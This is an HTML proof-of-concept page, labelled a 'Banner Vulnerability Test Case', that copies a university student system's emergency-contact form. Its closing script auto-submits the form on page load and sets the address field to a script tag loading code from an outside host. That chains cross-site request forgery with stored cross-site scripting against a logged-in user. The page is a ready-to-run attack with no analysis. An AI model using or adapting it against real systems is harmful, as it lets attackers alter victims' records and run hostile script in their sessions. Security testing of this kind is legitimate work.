<html><head><title>Banner Vulnerability Test Case</title></head>
<body>
<FORM ACTION="https://www.example.com/ss/twbksrch.P_ShowResults" METHOD="POST">
Search
<SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN>
<INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id">
<INPUT TYPE="submit" VALUE="Go">
</FORM>

</div>
</TD>
<TD CLASS="pldefault"><p class="rightaligntext">
<SPAN class="pageheaderlinks">
<A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu"  class="submenulinktext2" >RETURN TO MENU</A>
|
<A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A>
|
<A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status='';  return true" onMouseOut="window.status=''; return true"onFocus="window.status='';  return true" onBlur="window.status=''; return true"  class="submenulinktext2">HELP</A>
|
<A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A>
</span>
</TD>

</TR>
</TABLE>
</DIV>
<DIV class="pagetitlediv">
<TABLE  CLASS="plaintable" SUMMARY="This table displays title and static header displays."
   WIDTH="100%">
<TR>
<TD CLASS="pldefault">
<H2>Update Emergency Contacts</H2>
</TD>
<TD CLASS="pldefault">
 
</TD>
<TD CLASS="pldefault"><p class="rightaligntext">
<DIV class="staticheaders">
</div>
</TD>

</TR>
<TR>
<TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image"  NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD>
</TR>
</TABLE>
<a name="main_content"></a>
</DIV>
<DIV class="pagebodydiv">
<!--  ** END OF twbkwbis.P_OpenDoc **  -->
<DIV class="infotextdiv"><TABLE  CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page.  It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault"> </TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact.  When finished, Submit Changes.  </SPAN></TD></TR></TABLE><P></DIV>
<FORM NAME="MyForm" ACTION="https://www.example.com:9170/ssINTG/bwgkoemr.P_UpdateEmrgContacts" METHOD="post">
<INPUT TYPE="hidden" NAME="oldpri" VALUE="2">
<INPUT TYPE="hidden" NAME="last_active" VALUE="20070821154753">
<TABLE  CLASS="dataentrytable" SUMMARY="This layout table is used to format the Emergency Contacts form.">
<TR>

<TD CLASS="delabel" scope="row" ><LABEL for=remove_id><SPAN class=fieldlabeltext>Remove Contact:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault"><INPUT TYPE="checkbox" NAME="remove_it" ID="remove_id"></TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=priority_id><SPAN class=fieldlabeltext>Order:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="priority_in" SIZE="2" MAXLENGTH="1" VALUE="2" ID="priority_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=rship_id><SPAN class=fieldlabeltext>Relationship:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<SELECT NAME="rship" SIZE="1" ID="rship_id">
<OPTION VALUE="" SELECTED>Not Applicable

<OPTION VALUE="A">An Ex-spouse
</SELECT>
</TD>
</TR>
<TR>

<TD CLASS="delabel" scope="row" ><LABEL for=fname_id><SPAN class=fieldlabeltext>First Name:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="fname" SIZE="20" MAXLENGTH="15" ID="fname_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=mi_id><SPAN class=fieldlabeltext>Middle Initial:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="mi" SIZE="2" MAXLENGTH="1" ID="mi_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=lname_id><SPAN class=fieldlabeltext>Last Name:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">

<INPUT TYPE="text" NAME="lname" SIZE="35" MAXLENGTH="25" ID="lname_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=addr1_id><SPAN class=fieldlabeltext>Address Line 1:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="addr1" SIZE="35" MAXLENGTH="30" ID="addr1_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=addr2_id><SPAN class=fieldlabeltext>Address Line 2:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="addr2" SIZE="35" MAXLENGTH="30" ID="addr2_id">
</TD>
</TR>

<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=addr3_id><SPAN class=fieldlabeltext>Address Line 3:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="addr3" SIZE="35" MAXLENGTH="30" ID="addr3_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=city_id><SPAN class=fieldlabeltext>City:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="city" SIZE="30" MAXLENGTH="20" ID="city_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=stat_id><SPAN class=fieldlabeltext>State or Province:</SPAN></LABEL></TD>

<TD COLSPAN="5" CLASS="dedefault">
<SELECT NAME="stat" SIZE="1" ID="stat_id">
<OPTION VALUE="" SELECTED>Not Applicable
<OPTION VALUE="RI">Rhode Island
</SELECT>
</TD>
</TR>

<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=zip_id><SPAN class=fieldlabeltext>Zip or Postal Code:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<INPUT TYPE="text" NAME="zip" SIZE="11" MAXLENGTH="10" ID="zip_id">
</TD>
</TR>
<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=natn_id><SPAN class=fieldlabeltext>Country:</SPAN></LABEL></TD>
<TD COLSPAN="5" CLASS="dedefault">
<SELECT NAME="natn" SIZE="1" ID="natn_id">
<OPTION VALUE="" SELECTED>Not Applicable
OPTION VALUE="US">United States
</SELECT>
</TD>
</TR>

<TR>
<TD CLASS="delabel" scope="row" ><LABEL for=area_id><SPAN class=fieldlabeltext>Area Code:</SPAN></LABEL></TD>
<TD COLSPAN="1" CLASS="dedefault">
<INPUT TYPE="text" NAME="area" SIZE="4" MAXLENGTH="3" ID="area_id">
<TD CLASS="delabel" scope="row" ><LABEL for=phone_id><SPAN class=fieldlabeltext>Phone Number:</SPAN></LABEL></TD>
<TD CLASS="dedefault"><INPUT TYPE="text" NAME="phone" SIZE="9" MAXLENGTH="8" ID="phone_id"></TD>
<TD CLASS="delabel" scope="row" ><LABEL for=ext_id><SPAN class=fieldlabeltext>Extension:</SPAN></LABEL></TD>
<TD CLASS="dedefault"><INPUT TYPE="text" NAME="ext" SIZE="5" MAXLENGTH="4" ID="ext_id"></TD>
</TR>
</TABLE>
<P>
<INPUT TYPE="submit" VALUE="Submit Changes">
<INPUT TYPE="reset" VALUE="Reset">
</FORM>

<script>

document.MyForm.addr1.value='\<script src=http://www.example2.com/s>';
document.MyForm.natn.value='US';
document.MyForm.stat.value='RI';
document.MyForm.fname.value='NAME';
document.MyForm.lname.value='NAME';
document.MyForm.city.value='Providence';
document.MyForm.zip.value='02912';
document.MyForm.submit();
</script>

</body>
</html>